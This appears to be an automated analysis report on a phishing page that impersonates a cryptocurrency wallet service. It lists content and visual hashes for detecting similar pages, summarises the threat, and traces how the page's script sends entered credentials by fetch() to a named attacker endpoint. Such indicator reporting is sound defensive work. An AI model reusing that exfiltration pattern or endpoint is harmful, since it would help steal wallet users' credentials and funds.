Detailed analysis of captured phishing page
Used to detect similar phishing pages based on HTML content
| Algorithm | Hash Value |
|---|---|
|
CONTENT
TLSH
|
T11533D8B317491EFE10C783E0B722773673A863E5E5AF820682F847655B8BD4ADC63560 |
|
CONTENT
ssdeep
|
384:arhbSgbnziNBXELiy/Y+nPacLI/omC4mGHXISBhq8t8DDOmQpvqYtZ:4bbnzsZELk+Cuz63HX38umQpiQ |
Used to detect visually similar phishing pages based on screenshots
| Algorithm | Hash Value |
|---|---|
|
VISUAL
pHash
|
ce9234343696973e |
|
VISUAL
aHash
|
76383c3c30383000 |
|
VISUAL
dHash
|
c4f06969e0e0e0e0 |
|
VISUAL
wHash
|
7e787c7c7c783800 |
|
VISUAL
colorHash
|
38001600080 |
|
VISUAL
cropResistant
|
c4f06969e0e0e0e0 |
โข Threat: Phishing
โข Target: Cryptocurrency wallet users
โข Method: Impersonation and attempting to steal wallet credentials.
โข Exfil: Unknown, likely to a server controlled by attackers.
โข Indicators: Free hosting, brand-like appearance, 'wallet rectification'.
โข Risk: High
The site likely aims to trick users into entering their wallet credentials (seed phrases, private keys, etc.) on a fake login page.
User fills <input name=username> โ sendData() โ fetch(http://dusktestresolve.pages.dev/exfiltrate) โ credentials sent
User fills <input name=username> โ sendData() โ fetch(http://dusktestresolve.pages.dev/exfiltrate) โ credentials sent
coinMarquee.jssendDatasubmitFormPages with identical visual appearance (based on perceptual hash)
Found 1 other scan for this domain